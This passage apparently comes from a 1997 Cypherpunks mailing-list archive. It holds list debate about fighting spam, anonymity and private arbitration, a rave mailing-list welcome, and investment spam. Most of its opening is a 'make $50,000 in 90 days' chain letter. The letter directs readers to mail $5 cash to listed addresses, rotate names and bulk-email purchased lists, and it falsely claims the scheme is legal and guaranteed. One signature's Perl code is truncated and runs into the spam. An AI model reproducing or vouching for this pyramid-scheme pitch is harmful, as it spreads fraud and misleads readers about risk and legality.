PROGRAMS UNTIL YOU DO!"  My first step in making $50,000 in 20 to 90 days
was done.  By January 30th, I had received 196 orders for REPORT #2.  If you
go back to the GUARANTEE, "YOU MUST RECEIVE 100 OR MORE ORDERS FOR REPORT #2
WITHIN TWO WEEKS.  IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO.  ONCE YOU
HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL."
Well, I had 196 orders for REPORT #2, 96 more than I needed.  So I sat back
and relaxed.  By March 19th, of my emailing of 10,000, I received $58,000
with more coming in every day.

I paid off  ALL my debts and bought a much needed new car.  Please take time
to read the attached program, IT WILL CHANGE YOUR LIFE FOREVER!
Remember,  it wont work  if you don't try it.  This program does work, but
you must follow it EXACTLY!  Especially the rules of not trying to place
your name in a different place.  It doesn't work, you'll lose out on a  lot
of  money!  REPORT  #2  explains this.  Always follow the guarantee, 15 to
20  orders  for REPORT #1, and 100 or more orders for REPORT #2 and you will
make  $50,000 or more in 20 to 90 days.  I AM LIVING PROOF THAT IT WORKS !!!

If you choose not to participate in this program, I'm sorry.  It really is a
great opportunity with little cost or risk to you.  If you choose to
participate, follow the program and you will be on your way to financial
security.

If you are a fellow business owner and you are in financial trouble like I
was, or you want to start your own business, consider this a sign.  I DID!
		
				
PS  Do you have any idea what 11,700 $5 bills ($58,000) look like piled up
on a kitchen table? IT'S AWESOME!

"I THREW IT AWAY"
"I  had  received  this program before.  I  threw  it away, but later
wondered if I shouldn't have given it a try.  Of course, I had no idea who
to contact to get a copy, so I had to wait until I was emailed another copy
of the program.  Eleven months passed, then it came.  I DIDN'T throw this
one away.  I made $41,000 on the first try."

					Dawn W., Evansville, IN

"NO FREE LUNCH"
"My late father always told me, 'remember, Alan, there is no free lunch in
life.  You get out of life what you put into it.'  Through trial  and error
and a somewhat slow frustrating start, I finally figured it out. The program
works very well, I just had to find the right target group of people to
email it to.  So far this year, I have made over $63,000 using this program.
I know my dad would have been very proud of me."

					Alan B., Philadelphia, PA

A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM

By the time you have read the enclosed information and looked over the
enclosed program and reports, you should have concluded that such a program,
and  one that is legal,  could not have been created by an amateur.
Let me tell you a little about myself.  I had a profitable business for ten
years.  Then in 1979 my business began falling off.  I was doing the same
things that were previously successful for me, but it wasn't working.
Finally, I figured it out.  It wasn't me, it was the economy. Inflation and
recession had replaced the stable economy that had been with us since 1945.
I don't have to tell you what happened to the unemployment rate...because
many of you know from first hand  experience. There were more failures and
bankruptcies than ever before.

The middle class was vanishing.  Those who knew what they were doing
invested wisely and moved up.  Those who did not, including those who never
had anything to save or invest, were moving down into the ranks of the poor.
As the saying goes, "THE RICH GET RICHER AND THE POOR  GET POORER."  The
traditional methods of making money will never allow you to "move up" or
"get rich", inflation will see to that.
You have just received information that can give you financial freedom for
the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF EFFORT."
You can make more money in the next few months than you have ever imagined.

I should also point out that I will not see a penny of your money, nor
anyone else who has provided a testimonial for this program.  I have already
made over FOUR MILLION DOLLARS!  I have retired from the program after
sending out over 16,000 programs.  Now I have several offices which market
this and several other programs here in the US and overseas.  By the Spring,
we wish to market the 'Internet' by a partnership with AMERICA ON LINE.

Follow the program EXACTLY AS INSTRUCTED.  Do not change it in any way.
It works exceedingly well as it is now.  Remember to email a copy of this
exciting program to everyone that you can think of.  One of the people you
send this to may send out 50,000...and your name will be on every one of
them!.  Remember though, the more you send out, the more potential customers
you will reach.

So my friend, I have given you the ideas, information, materials and
opportunity to become financially independent, IT IS UP TO YOU NOW!

"THINK ABOUT IT"

Before you delete this program from your mailbox, as I almost did, take a
little time to read it and REALLY THINK ABOUT IT.  Get a pencil and figure
out what could happen when YOU participate.  Figure out the worst possible
response and no matter how you calculate it, you will still make a lot of
money!  Definitely get back what you invested.  
Any doubts you have will vanish when your first orders come in.  IT WORKS!

					Paul Johnson, Raleigh, NC

HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$

Let's say that you decide to start small, just to see how it goes, and we'll
assume you and all those involved send out 2,000 programs each. Let's also
assume that the mailing receives a .5% response.  Using a good list the
response could be much better.  Also many people will send out hundreds of
thousands of programs instead of 2,000.  But continuing with this example,
you send out only 2,000 programs.  With a 5% response, that is only 10
orders for REPORT #1.  Those 10 people respond by sending out 2,000 programs
each for a total of 20,000.  
Out of those .5%, 100 people respond and order REPORT #2.  Those 100 mail
out 2,000 programs each for a total of 200,000.  The .5% response to that is
1,000 orders for REPORT #3.  Those 1,000 send out 2,000 programs each for a
2,000,000 total.  The .5% response to that is 10,000 orders for REPORT #4.
That's 10,000 five dollar bills for you. CASH!!!!  Your total income in this
example is $50 + $500 + $5000 +$50,000 for a total of $55,550!!!!

REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU MAIL TO WILL
DO ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM!  DARE TO THINK FOR A MOMENT
WHAT WOULD HAPPEN IF EVERYONE  OR HALF SENT OUT 100,000 PROGRAMS INSTEAD OF
ONLY 2,000.  
Believe me, many people will do that and more!  By the way, your cost to
participate in this is practically nothing.  You obviously already have an
internet connection and email is FREE!!!  REPORT #3 will show you the best
methods for bulk emailing and purchasing email lists.

THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY.  It does not require
you to come in contact with people, do any hard work, and best of all, you
never have to leave the house except to get the mail.  If you believe that
someday you'll get that big break that you've been waiting for, THIS IS IT!
Simply follow the instructions, and your dream will come true.  This
multi-level email order marketing program works perfectly...100% EVERY TIME.
Email is the sales tool of the future.  Take advantage of this
non-commercialized method of advertising NOW!!  The longer you wait, the
more people will be doing business using email.  Get your piece of this action!!

MULTI-LEVEL MARKETING (MLM) has finally gained respectability.  It is being
taught in the Harvard Business School, and both Stanford Research and The
Wall Street Journal have stated that between 50% and 65% of all goods and
services will be sold throughout Multi-level Methods by the mid to late
1990's.  This is a Multi-Billion Dollar industry and of the 500,000
millionaires in the US, 20% (100,000) made their fortune in the last several
years in MLM.  Moreover, statistics show 45 people become millionaires
everyday through Multi-Level Marketing.

INSTRUCTIONS

We at Erris Mail Order Marketing Business, have a method of raising capital
that REALLY WORKS 100% EVERY TIME.  I am sure that you could use $50,000 to
$125,000 in the next 20 to 90 days.  Before you say "Bull", please read the
program carefully.

This is not a chain letter, but a perfectly legal money making opportunity.
Basically, this is what we do:  As with all multi-level business, we build
our business by recruiting new partners and selling our products.  Every
state in the USA allows you to recruit new multi-level business partners,
and we offer a product for EVERY dollar sent. YOUR ORDERS COME AND ARE
FILLED THROUGH THE MAIL, so you are not involved in personal selling.  You
do it privately in your own home, store or office.

This is the GREATEST Multi-level Mail Order Marketing anywhere:

Step (1)   Order all four 4 REPORTS listed by NAME AND NUMBER.  Do this by
ordering the REPORT from each of the four 4 names listed on the next page.
For each REPORT, send $5 CASH and a SELF-ADDRESSED, STAMPED envelope
(BUSINESS SIZE #10) to the person listed for the SPECIFIC REPORT.
International orders should also include $1 extra for postage.  It is
essential  that you specify the NAME and NUMBER of the report requested to
the person you are ordering from.  You will need ALL FOUR (4) REPORTS
because you will be REPRINTING and RESELLING them.
           DO NOT alter the names or sequence other than what the
instructions say.  IMPORTANT:  Always provide same-day service on all orders.

Step (2)   Replace  the  name  and  address  under  REPORT #1  with yours,
moving the one that was there down to REPORT #2.           Drop  the  name
and address under REPORT #2 to REPORT #3, moving the one that was there to
REPORT #4.  The name and           address that was under REPORT #4 is
dropped from the list and this party  is  no doubt on the way to the bank.
When doing this, make certain you type the names and addresses ACCURATELY!
DO NOT MIX UP MOVING PRODUCT/REPORT  POSITIONS!!!

Step (3)   Having made the required changes in the NAME list, save it as a
text (.txt) file in it's own directory to be used with whatever email
program you like. Again, REPORT #3 will tell you the best methods of bulk
emailing and acquiring email lists. Step (4)   Email a copy of the entire
program (all of this is very important) to everyone whose address you can
get your hands on. Start with friends and relatives since you can encourage
them to take advantage of this  fabulous  money-making opportunity. that's
what I did.  And they love me now, more than ever. Then, email to anyone and
everyone!  Use your imagination! You can get email addresses from companies
on the internet who specialize in email mailing lists.  These are very
cheap, 100,000 addresses for around $35.00.

IMPORTANT:  You won't get a good response if you use an old list, so always
request a FRESH, NEW list. You will find out where to purchase these lists
when you order the four 4 REPORTS.

ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!

REQUIRED REPORTS

***Order each REPORT by NUMBER and NAME***

ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE
AND $5 CASH FOR EACH ORDER REQUESTING THE
SPECIFIC REPORT BY NAME AND NUMBER
________________________________________________________
REPORT #1
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"

ORDER REPORT #1 FROM:

TGOLF
P O Box 1735
TIOGA, LA. 71477

________________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

D&S ENTERPRISES
BOX 158
ROCKFORD, IL 61105
________________________________________________________
REPORT #3
"SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:

WTM ENTERPRISES
6985 S. LEWIS AVE
TULSA, OK 74136
________________________________________________________
REPORT #4
"EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:

OPM
RT 2 BOX 396A
JENKS, OK 74037
_______________________________________________________

CONCLUSION

.I am enjoying my fortune that I made by sending out this program. You too,
will be making money in 20 to 90 days, if you follow the SIMPLE STEPS
outlined in this mailing.

To be financially independent is to be FREE.  Free to make financial
decisions as never before.  Go into business, get into investments, retire
or take a vacation.  No longer will a lack of money hold you back.

However, very few people reach financial independence, because when
opportunity knocks, they choose to ignore it.  It is much easier to say "NO"
than "YES", and this is the question that you must answer.  Will YOU ignore
this amazing opportunity or will you take advantage of it? If you do
nothing, you have indeed missed something and nothing will change.  Please
re-read this material, this is a special opportunity. If you have any
questions, please feel free to write to the sender of this information.  You
will get a prompt and informative reply.

My method is simple.  I sell thousands of people a product for $5 that costs
me pennies to produce and email.  I should also point out that this program
is legal and everyone who participates WILL make money. This is not a chain
letter or pyramid scam.  At times you have probably received chain letters,
asking you to send money, on faith, but getting NOTHING in return, NO
product what-so-ever!  Not only are chain letters illegal, but the risk of
someone breaking the chain makes them quite unattractive.

You are offering a legitimate product to your people.  After they purchase
the product from you, they reproduce more and resell them. It's simple free
enterprise.  As you learned from the enclosed  material, the PRODUCT is a
series of four 4 FINANCIAL AND BUSINESS REPORTS.  
The information contained in these REPORTS will not only help you in making
your participation in this program more rewarding, but will be useful to you
in any other business decisions you make in the years ahead. You are also
buying the rights to reprint all of the REPORTS, which will be ordered from
you by those to whom you mail this program.  The concise one and two page
REPORTS you will be buying can easily be reproduced at a local copy center
for a cost off about 3 cents a copy.
Best wishes with the program and Good Luck!

"IT WAS TRULY AMAZING"

"Not being the gambling type, it took me several weeks to make up my mind to
participate in this program.  But conservative as I am, I decided that the
initial investment was so little that there was no way that I could not get
enough orders to at least get my money back.  BOY, was I ever surprised when
I found my medium sized post office box crammed with orders!  I will make
more money this year than any ten years of my life before."

					Mary Riceland, Lansing, MI

TIPS FOR SUCCESS

Send for your four 4 REPORTS immediately so you will have them when the
orders start coming in.  When you receive a $5 order, you MUST send out the
product/service to comply with US Postal and Lottery laws.  Title 18
Sections 1302 and 1341 specifically state that:  "A PRODUCT OR SERVICE MUST
BE EXCHANGED FOR MONEY RECEIVED."

WHILE YOU WAIT FOR THE REPORTS TO ARRIVE:

1.	Name your new company. You can use your own name if you desire.

2.	Get a post office box (preferred).

3.	Edit the names and addresses on the program. You must remember,
your name and address go next to REPORT #1 and the others all        move
down one, with the fourth one being bumped OFF the list.

4.	Obtain as many email addresses as possible to send until you
receive the information on mailing list companies in REPORT #3.

5.	Decide on the number of programs you intend to send out.  The more you
send, and the quicker you send them, the more money  you will make.

6.	After mailing the programs, get ready to fill the orders.

7.	Copy the four 4 REPORTS so you are able to sent them out as  soon as you
receive an order. IMPORTANT: ALWAYS PROVIDE    SAME-DAY SERVICE ON ORDERS
YOU RECEIVE!

8.	Make certain the letter and reports are neat and legible.

YOUR GUARANTEE

The check point which GUARANTEES your success is simply this:  you must
receive 15 to 20 orders for REPORT #1.  This is a must!!!  If you don't
within two weeks, email out more programs until you do.  Then a couple of
weeks later you should receive at least 100 orders for REPORT #2, if you
don't, send out more programs until you do.  Once you have received 100 or
more orders for REPORT #2, (take a deep breath) you can sit back and  relax,
because  YOU  ARE  GOING TO  MAKE  AT  LEAST  $50,000. Mathematically  it
is  a  proven  guarantee.   Of  those  who  have participated in the program
and reached the above GUARANTEES-ALL have reached their $50,000 goal.  Also,
remember, every time your name is moved down the list you are in front of a
different REPORT, so you can keep track of your program by knowing what
people are ordering from you.
IT'S THAT EASY, REALLY, IT IS!!!

REMEMBER:
"HE WHO DARES NOTHING, NEED NOT HOPE FOR ANYTHING."
"INVEST A LITTLE TIME, ENERGY AND MONEY NOW OR
SEARCH FOR IT FOR THE REST OF YOUR LIFE."










From dformosa at st.nepean.uws.edu.au  Sat Aug  2 23:40:28 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 14:40:28 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <199708030134.CAA13809@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 3 Aug 1997, Adam Back wrote:

> David Formosa  writes:

[...]

> > The best soultion given so far is Cause's suggestion of modifying
> > the fax law so that we can sue the spammers.
> 
> Law, and suing and the internet don't mix.

You got to be jokeing, what about alomost every AOL vs. Cyberpromo or
Compuserve vs. Cyberpromo or all thouse other ISPs against Cyberpromo.

> Eg. Say I spam you via an anonymous remailer.  So now who are you
> going to sue?

The spammers if there advertising a servese will need someway for me to
contact them.  Some way for me to get the goods.  Just anonomising the
email will not hide there identy.  Any way pushing spammer email though
most email remailers will cause them to crash from sheare volume.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+PrK6QK0ynCmdStAQHO5QP+PtZAMkM0LhIlDSiqVyPd0nFkpj9RUyGO
GOHGwCthHRNIOnUVO4RleulbIVErrm6dMauqKM3IL5MtjBz0iDWSQPk06OULq0e+
SQGyhl178H4WfZlZ+G7gcevh/Zyof0/rFJ6YBJX4MXfkitQNRdw4jCSoyiXjK7tt
zM1Cl75OdX8=
=AcLG
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Sat Aug  2 23:46:58 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 14:46:58 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Steve Schear wrote:

[...]

> >Naturally, rich, indolent technologists tend to favor schemes that
> >will put them in control. :-)
> 
> I can't fuly agree. In Europe, both communism and fascism started from the
> socialists (in fact, the fascist were called National Socialists)

The fascists called themselves Socialists for the same reson that the
main pro logging group calls themselfs _The Forest Protection Socity_ as a
returorical techneek to sucker peaple.

[...]

> and both accept the "... idea of a political party which embraces all 
> activities of the individual from the cradle to the grave, which claims
> to guide his views on everything, and which delights in making all
> problems questions of party...," F.A. Hayek, The Road to Surfdom.

Replace political party with free market and you get the econmic
reationalisum/thatureisum that has chocked socity.  The freandly socilisum
that both the GNU mannifesto and most of the net works on has no such
totalitarian tendencies.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+PtKqQK0ynCmdStAQGugAP/Shfhpjw/ZtjegN0doAf79/eUUnNchHk5
Ki6oV8wYnRQPj6t2PTPrWi80RCotkGkG41e9YCAbuO5M3vmIZeHR2Hs8EzvXFSHs
9P0vuX4KwoLDcZpSJtXaDwA9FiuD7iO0xh8Rc0bfsIwzGA81OglQS++oy+VK8mEu
QdFS2QhRGfU=
=24bD
-----END PGP SIGNATURE-----






From nobody at REPLAY.COM  Sun Aug  3 00:09:29 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 3 Aug 1997 15:09:29 +0800
Subject: Duncan Long on Cypherpunks and Guns
Message-ID: <199708030657.IAA25280@basement.replay.com>



Tim May wrote:
> 
> While looking through Duncan Long's Web pages on survivalism, guns, and
> such, I found this interesting mention of Cypherpunks.
> This particular article is at: http://www.prairienet.org/guns/dlgs/gun3.htm

> --begin excerpt from Duncan Long's article--

> Cypherpunks: Individuals who believe that the government is out to invade
> the privacy of everybody on the planet. The cypherpunk's central
> goal is to out-smart the system. (The encryption program, PGP, is often
> referred to by this group as "the Cypherpunk's best friend").
 
> Ravers: Folks who use synthesized and sampled music, computer-generated
> psychedelic ("cyberdelic") art, and designer drugs to create
> massive all-night dance parties and love-fests in empty warehouses.

  Damn, I'm on the wrong list...

RaveMonger






From nobody at REPLAY.COM  Sun Aug  3 01:22:26 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 3 Aug 1997 16:22:26 +0800
Subject: Tim Misfires / Re: Joichi Ito as a Junior Policeman
Message-ID: <199708030802.KAA01641@basement.replay.com>



Joichi Ito wrote:
> At 23:46 97/08/01 -0700, Tim May wrote:
> > And why are you helping to write a report that will be the "official
> > position" of the Japanese cops?

> Because, it would be much better to have it say, "we don't want key
> escrow." My position on the study group is much more like making
> a testimony in congress. Unlike the US, once a bill hits the floor,
> it is very hard to participate. I have to participate while it is still
> in the ministry level.

  Tim spends so much time cleaning his guns he sometimes gets a bit
myopic and everything he sees looks like a "target."
  While it is true that the process Joichi Ito is speaking of is still
subject to the failing of those "protesting" becoming bum-buddies with
those they are "protesting against," it is also true that it is more 
like giving opposing Congressional testimony than like joining the
"old boys" at the Whithouse to trade your soul for a few moments of
touching the hem of the King's garment at the seat of power.

> > The JDF is notoriously militaristic. You should reconsider this.

> > And Cypherpunks should be very careful about "advising" an obviously
> > co-opted member of the Japanese military and police establishment.

> Again. If you want to view me as "co-opted" that's fine. Without me,
> you would not have gotten Gilmore, Carl Ellison, or Whit Diffie's voice
> on the record during the study group hearings. Do you think I should
> just sit back and let the KEA's take over?

  It is clearly up to Joichi Ito to decide how he can best work toward
cypherpunk goals under his system of government, but he would do well
to listen to those on the list who have seen more than a few crusaders
sink into the swill when they make the mistake of talking to the piggies
too close to the trough.
  A good sign that you have not yet been co-opted is if you still take
that "extra" briefcase to the meetings, just in case.
{"I've got to run out to my car for a moment with my briefcase, but I
will be leaving my _other_ briefcase here." }

TruthMonger






From sar at cynicism.com  Sun Aug  3 01:37:35 1997
From: sar at cynicism.com (sar)
Date: Sun, 3 Aug 1997 16:37:35 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <199708021921.UAA06401@server.test.net>
Message-ID: <3.0.2.32.19970803032004.00818890@box.cynicism.com>



At 06:32 AM 8/3/97 +1000, ? the Platypus {aka David Formosa} wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Sat, 2 Aug 1997, Adam Back wrote:
>
>> Next we choose a threshold say 1000 posts per day.  Seems hard to
>> imagine anyone generating manually over 1000 emails per day.  That's
>> more than 1 per minute for a 10 hour day.
>
>I bet this mailing list generates traffic of that order.  I would not wish
>to see legitimite mailing lists shut down to stop the spam.
>
>The best soultion given so far is Cause's suggestion of modifying the fax
>law so that we can sue the spammers.
>
Take bugtraq which has over 12,000 subscribers. Each post to bugtraq would
send out 12,000 emails so it would cost aleph one 1200$ per post to his
list. I dont think anyone would want to run a mailing list under these
sorts of conditions. Or say you run a normaly small mailing list with only
a few subscribers. One evil person could send just a few hundred emails to
you cost you money. The same goes for anon emails. Anyone not wanting to
take the chance of ending up spending $100 or more at the whim of any 14
year old with a copy of upyours or not wanting to have to pay for providing
a free public service would simply give up and shut down his mailinglist.

   






From nobody at REPLAY.COM  Sun Aug  3 03:02:25 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 3 Aug 1997 18:02:25 +0800
Subject: your LISTSERV request  "subscribe socal-raves-digest"Re: your LISTSERV request  "subscribe socal-raves-digest"
Message-ID: <199708030954.LAA12408@basement.replay.com>



^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~

	Welcome to the Southern California Rave mailing list!

^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~

     Better known as SoCal-Raves, this list is for the discussion of
anything having to do with raves and the underground club/dance scene
in the Southern California area.  This includes the counties of Los
Angeles, Orange, San Diego, Riverside, San Bernardino, and possibly
Ventura and Santa Barbara as well.
     Don't let the broad area scare you.  This list is about the local
scene.  About what is happening near you.  Although rave flyers seem
to think L.A. and San Diego are the only places local DJs are from,
there is quite possibly something going on in your backyard.  And this
is the place to talk about it.

     Appropriate topics include:
       - announcements of upcoming events in the Southern California 
area.
       - reviews of shows/raves/DJs/music/etc.
       - rave-culture like clothes, smart drinks, rave attitude, etc.
       - local radio shows and stations that play rave and techno.
       - where to find the music, clothes, etc.
       - rave picnics and other non-rave rave-related events.
       - how to throw your own rave (and not get busted).
       ...and almost anything else rave related or related to the
          local scene.

     Try not to discuss raves not in the Southern California area or
subjects that don't have anything to do with raves or this area.
Though some discussions of other rave scenes may at times be
appropriate.  And try to keep from getting into flame wars and overly
personal discussions on the list.  Some comments are probably better
kept to personal mail.  Keep in mind that what you are sending to the
list you are sending to everybody.
      Other than that, go for it.  This is your list.  Your scene.
I'm hoping that this list can be a catalyst for helping to improve and
unify the scene in SoCal.  At least we should be able to get that
"community" feeling that so many have trouble finding in the SoCal
rave scene.  And maybe, some day soon, we might even be throwing our
own raves just as the SFRaves list has.

      This list should also be a good place to find out about the
scene in SoCal.  Hopefully soon there will be a calendar list.  In the
mean time please send me any info you have on upcoming raves and I
will compile an upcoming rave calendar and post it to the list once a
week.

      Now for the technical stuff:

      - Any mail sent to socal-raves at ucsd.edu will get sent out to
        everyone who subscribes to the list.
      
      - socal-raves-request at ucsd.edu should be used to subscribe and
        unsubscribe to the list.  To subscribe you should send a
        message with the line "sub socal-raves" or 
        "sub  socal-raves" in the body of the message,
        not the subject line.  The latter form should be used if you
        want to use an address other than the one shown in the "From:"
        line of the message.  If at any time you want to unsubscribe
        or delete your name from the list (we would miss you) the line
        would be "del socal-raves".  If you need help send a message
        with the line "HELP" and you will get a help file on how to
        use the listserv.

      - Administrative problems about the list should be sent to
        socal-raves-relay at ucsd.edu and Vigor Mortis, list administrator
        extraordinaire, will take care of you.
      
      - Any other SoCal-Raves list questions and rave info (for the
        calendar) should go to me at underdog at netcom.com

      Some info about me.  When I started college about a five years
ago I was intrigued by industrial music that was nameless to me at the
time.  Within a year or two I was doing an industrial radio show and
going to underground clubs that played everything from acid house to
industrial danse.  Although many of these clubs were illegal, there
was not a lot of hype, and they were definitely better than the L.A.
club scene (which always seemed to me to be one big pickup joint/ meat
market).  They were basic.  Raw.  Even tribal.  Full of energy.  They
gave me a place to dance without feeling pressured to ask some woman
to dance with me who could care less.  I really wanted to start a
"gypsy club" of my own in Orange County.  Not for profit, just so that
people might have a local place to go.  But too many things and people
conspired against me.
     Then the word "rave" came into existence and shortly following
808 State's new album.  It seemed to me that all the energy of
Industrial, and the groove of Acid House was forming a new "Techno"
genre and a new scene.  This was a fresh injection of energy.  The
underground parties grew up.  There was new hype and new ideas.  More
of my friends came with me to rave.  And the birth of a new radio
station helped expand the scene.
      It was fun and still is.  But the radio station died.  The scene
mostly caved in on it's own weight (hype and greed only go so far).
Big raves that I paid good money for didn't happen.  And we are left
with what?
      There is still that sense of acceptance.  The sense of unity and
anything goes.  And I think we are starting to come back to that old
feeling of community and being a part of something again.  This summer
a few friends and I were even able to throw a few free outdoor raves.
Though small, these were to be the start of a regular thing for the
summer but the fourth one got busted and we stopped.  I'm hoping that
it will happen again though (legally :).
      The underground scene here always seems to be able to recreate
itself.

      Remember,the rave scene is for and about the people.  About
individual empowerment.  Where an artist in a bedroom can get as big
as the world will allow and where 'people' not 'person' are the center
of attention.

      Big thanks go out to Brian (Vitamin B) and the SFRaves mailing
list for inspiration, Dana Watanabe my co-conspirator in raves and
other things, and Andy Ferrell (Vigor Mortis) for administrating and
offering a place for the SoCal-Raves list.

      I hope you enjoy this list as much as I do.
      Peace and Love.  And may you find a rave wherever you are.

Joachim






From aba at dcs.ex.ac.uk  Sun Aug  3 03:40:31 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 18:40:31 +0800
Subject: no government regulation of the net (was Re: bulk postage fine)
In-Reply-To: 
Message-ID: <199708031023.LAA00663@server.test.net>




David Formosa  writes:
> On Sun, 3 Aug 1997, Adam Back wrote:
> 
> > David Formosa  writes:
> 
> [...]
> 
> > > The best soultion given so far is Cause's suggestion of modifying
> > > the fax law so that we can sue the spammers.
> > 
> > Law, and suing and the internet don't mix.
> 
> You got to be jokeing, what about alomost every AOL vs. Cyberpromo or
> Compuserve vs. Cyberpromo or all thouse other ISPs against Cyberpromo.

It happens, but IMO it's an inefficient dumb way to go about business.
The more modern net based enterprises will use more efficient
non-governmental solutions, and their more efficient conflict
resolution mechanisms will allow them to out-price, and eventually
cause the dinosaurs to go bankrupt, or to adopt similarly efficient
approaches.

Government backed legal systems are inefficient.  A purely anonymous
transaction where both parties identity is well concealed is much more
efficient.  There is no one to sue.  Fighting legal suits is
expensive, especially in the US.

The high rates go to the unproductive members of society, government
court officials, over-priced lawyers, etc.  This drives up all prices
through insurance premiums.  The company has to pass on the cost of
the legal system to their clients.

Mutually negotiated arbitration as part of the contract of sale is
much more efficient.  Third party arbitrators holding with a copy of
the contract, a deposit from each party in escrow, and a reputation as
a fair arbitrator is much more efficient.  Either party breaks the
contract as decided by the arbitrator and they loose their deposit.

Some people are using arbitration services now as an alternative to
the government legal system.  This is a form of automatic
privatisation of the legal system.  The government legal systems are
facing free market competition.

It'll probably help if the arbitration service is anonymous also, else
some idiot will fall back to the government backed legal system and
raise the prices of arbitration through the insurance costs they'll
have to factor in case of being themselves sued in a government court.

> > Eg. Say I spam you via an anonymous remailer.  So now who are you
> > going to sue?
> 
> The spammers if there advertising a servese will need someway for me to
> contact them.  Some way for me to get the goods.  Just anonomising the
> email will not hide there identy.  

True.  But how do you prove to one of these inefficent government
courts that it is indeed the spam beneficiary who posted the spam.

What if he says "I didn't do it"?  He's probably right, he probably
paid Spamford to do it for him.  Or perhaps someone doesn't like the
company and does a spam with their contact information just to cause
them trouble?  I'm sure it's happened before.

I'm not sure it's so easy to identify the spammer.  You can't sue the
person who's number is at the bottom.  What about the politician who's
home phone number got spammed to alt.sex.* as a phone sex number.

So to the government mentality when they bump into this problem, it
means that they will try to prevent anonymity.  They'll want you to
use their new fangled PKI to have either no anonymity, or else
escrowed anonymity, where the government gets to see who everyone is.

> Any way pushing spammer email though most email remailers will cause
> them to crash from sheare volume.

That's also not a good thing.

The danger with using government to attack spammers, is that this is
the net, and we don't want governments involved in regulation of
content, nor in attempting to enforce "identity escrow", "internet
drivers licenses" or anything else.

This is the likely long term or even possibly short term outcome of
calling for help from government to sort out spammers.

We can sort them out ourselves without the need of government
intervention, thanks kindly.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0


       INVESTORS, BROKER/DEALERS, AND BUSINESS OWNERS!

     The Global Stock Exchange  has a new service on the web that will alert 
you to new and promising issues as well as exciting ipos, secondary offerings, 
and private offerings.  If you would like us to keep you informed by way of 
short messages pointing you via hot link to issues on the web, click on 
our hot link below, visit our site, and sign up for the service you choose!  
It's free, fast, easy, confidential, and we think you'll be glad you took 
a moment to fill out our simple form at:   GSE1.

     The Global Stock Exchange also deals with mergers, acquisitions, and 
in taking companies public.  If you have an interest in going public or 
merging your public shell, visit:   GSE2.

     For funding options visit:   GSE5.

Thank you,  
John, Kevin, and Crew at
The Global-Stock-Exchange


     If this message offends you in any way, please accept my apology for 
disturbing you.   Just reply to   GSE  
 with "remove" in the Subject or the Message section of the reply mail and
 your name will be removed from our database.

     To be globally removed from all lists go to   IEMMC.








From 53573730 at usa.net  Sun Aug  3 18:41:00 1997
From: 53573730 at usa.net (53573730 at usa.net)
Date: Sun, 3 Aug 1997 18:41:00 -0700 (PDT)
Subject: Investing on the Web?
Message-ID: <>


       INVESTORS, BROKER/DEALERS, AND BUSINESS OWNERS!

     The Global Stock Exchange  has a new service on the web that will alert 
you to new and promising issues as well as exciting ipos, secondary offerings, 
and private offerings.  If you would like us to keep you informed by way of 
short messages pointing you via hot link to issues on the web, click on 
our hot link below, visit our site, and sign up for the service you choose!  
It's free, fast, easy, confidential, and we think you'll be glad you took 
a moment to fill out our simple form at:   GSE1.

     The Global Stock Exchange also deals with mergers, acquisitions, and 
in taking companies public.  If you have an interest in going public or 
merging your public shell, visit:   GSE2.

     For funding options visit:   GSE5.

Thank you,  
John, Kevin, and Crew at
The Global-Stock-Exchange


     If this message offends you in any way, please accept my apology for 
disturbing you.   Just reply to   GSE  
